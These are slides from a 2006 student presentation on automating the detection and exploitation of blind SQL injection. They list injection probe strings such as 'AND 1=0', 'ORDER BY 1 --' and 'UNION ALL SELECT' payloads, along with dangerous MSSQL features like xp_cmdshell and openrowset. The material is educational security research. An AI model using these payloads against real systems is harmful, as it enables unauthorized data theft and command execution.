Automated Estimation and
Evaluation of SQL-injection
Vulnerabilities
Jonas Persson, Group 30 - Language based security
2006
Contents
The impact of SQL-injection
 Blindfolded SQL-injection
 What has been done before
 Automating the process
 Results
 Conclusions

Impact of SQL-injection

Sysobjects – stores info on all tables in the database

Sysdatabases – stores info on all databases on server





Xp_cmdshell – executes arbitrary commands
Bcp – write to arbitrary file
Openrowset – transfer data from/to remote SQL-server
Xp_regwrite – write arbitrary registry values
Bulk insert – insert from arbitrary file
Blindfolded SQL-injection



Should not rely on contents of error
messages
The only relevant question is – did the
query execute or not?
Procedure:
•
•
•
Determine errors
Find format and query structure
Exploit
What has been done before


Automated datamining using blindfolded
SQL-injection (Absinthe by Cameron
Hotchkies)
Vulnerability scanning tools with support
for finding SQL-injections
Limitations


Absinthe only mines for data from existing
injections, does not find the vulnerabilities
All vulnerability scanning tools I have
tested only appends a single quote at the
end of parameter values and report a
vulnerability if the server returns a ”500 –
internal server error”
Automating the process

Determine errors
• Appending ” AND ” should give incorrect
syntax error
• Appending ” AND 1=0 ” should result in error
• Appending ” AND 1=1 ” should not result in
error

Comparing to these results will tell us
wether appending ” AND (any sql) ”
executed or not
Automating the process

Finding format
• Appending ” -- ” might remove
necessary ending parentheses
• Breaking out of parentheses by trying to
end them one by one until the query
executes

More advanced formats does not
require this procedure
Automating the process

Finding the query structure
• How many columns does the query
select? Try ordering! ” ORDER BY 1 -- ”
• Which types does the selected columns
have?
• Three base types strings, ints and dates
• Append ” UNION ALL SELECT null -- ”
• Append ” UNION ALL SELECT 1 -- ”
• Append ” UNION ALL SELECT ’1’ -- ”
Automating the process

Once you have found the format and
structure, exploiting is easy!
” UNION ALL SELECT columns FROM table -- ”
Automating the process

Checking the impact
• Selecting from system tables
• Running stored procedures
• Connect to other servers through
openrowset
• Read files with bulk insert
• Options are limitless!
Results

A program that
• Evaluates a parameter and returns how
likely it is that the parameter is
vulnerable and exploitable
• Finds format and query structure
• Estimates how vulnerable the parameter
is on a scale from 1 to 10
• Reports its findings to the user, detailing
the vulnerability and its impact
Results
Conclusions


As we just have seen it is indeed possible
to automate the search and exploitation of
SQL-injection vulnerabilities
The example can be extended in many
different ways to create either a versatile
audit tool or a powerful hacking tool